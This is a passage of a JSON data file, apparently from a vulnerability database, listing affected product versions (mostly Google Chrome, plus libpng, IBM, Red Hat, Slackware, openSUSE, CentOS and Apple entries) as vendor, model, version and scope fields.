},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1006.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.91"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1653.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.66"
},
{
"_id": null,
"model": "websphere real time sr7 fp1",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3"
},
{
"_id": null,
"model": "tivoli common reporting",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.1.0.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.58"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.204"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1083.0"
},
{
"_id": null,
"model": "aix",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.335"
},
{
"_id": null,
"model": "tivoli common reporting",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.1.2.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.695.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1688.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.325"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.24"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.732.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.50"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.11"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.58"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1290.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.20"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.26"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.712.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1286.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.558.0"
},
{
"_id": null,
"model": "enterprise linux workstation optional",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.28"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.822.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.40"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.120"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.665.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.39"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.629.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1012.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.339"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.109"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.5.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.15"
},
{
"_id": null,
"model": "tivoli monitoring",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2.3"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.38"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.10"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.41"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.763.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.112"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.947.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.55"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "13.37"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1276.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.168"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.878.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.39"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.42"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1663.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.48"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.29"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.24"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.837.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.43"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.70"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.39"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.93"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.9"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.929.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.324"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.81"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.30"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "29.0.1547.48"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.787.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.323"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.82"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.36"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.684.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.55"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.22"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.35"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.47"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.121"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.38"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1076.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.123"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "29.0.1547.3"
},
{
"_id": null,
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.1.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1307.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.103"
},
{
"_id": null,
"model": "opensuse",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "13.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.120"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.928.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.757.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.20"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.55"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.45"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.39"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.31"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.118"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.30"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.54"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.42"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.120"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.23"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.62"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.58"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.70"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.832.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.63"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1066.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1700.50"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.55"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.48"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.702.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.316"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.49"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.36"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1284.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "43.0.2357"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.48"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874102"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1018.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1278.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.229"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.572.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.36"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.37"
},
{
"_id": null,
"model": "libpng",
"scope": "ne",
"trust": 0.3,
"vendor": "libpng",
"version": "1.6.19"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.146"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.139"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.22"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.60"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1700.65"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.76"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1282.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1057.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.88"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.47"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.49"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.80"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.46"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.777.4"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.100"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.777.1"
},
{
"_id": null,
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.4.0"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.10.5"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.26"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.63"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.45"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.51"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.21"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.20"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.21"
},
{
"_id": null,
"model": "expeditor",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.76"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1030.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.340"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.45"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1689.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.889.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.85"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.81"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.343"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.679.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.38"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.103"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.57"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.893.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.5"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.644.0"
},
{
"_id": null,
"model": "enterprise linux server optional",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.70"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.570.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.17"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.52"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.37"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.9"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.34"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.30"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.933.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.10"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.31"
},
{
"_id": null,
"model": "tivoli monitoring",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.3.0.1"
},
{
"_id": null,
"model": "websphere real time sr5",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.887.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.23"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1288.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.36"
},
{
"_id": null,
"model": "websphere real time sr8 fp10",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1498.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.793.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.151"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1301.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.71"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.19"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.34"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.29"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.13"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1043.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1000.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.19"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.317"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.5"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.909.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.886.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.17"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.17"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.14"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.936.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.318"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.96"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.115"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.27"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.60"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.52"
},
{
"_id": null,
"model": "tivoli monitoring",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.3.0.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.19"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.56"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.63"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.808.0"
},
{
"_id": null,
"model": "linux -current",
"scope": null,
"trust": 0.3,
"vendor": "slackware",
"version": null
},
{
"_id": null,
"model": "tivoli network manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.584.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.33"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1042.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.12"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.120"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.907.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.29"
},
{
"_id": null,
"model": "cognos metrics manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.2.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.71"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1685.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.108"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.25"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.52"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.81"
},
{
"_id": null,
"model": "centos",
"scope": "eq",
"trust": 0.3,
"vendor": "centos",
"version": "6"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.823.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.791.0"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.5"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.577.0"
},
{
"_id": null,
"model": "chrome",
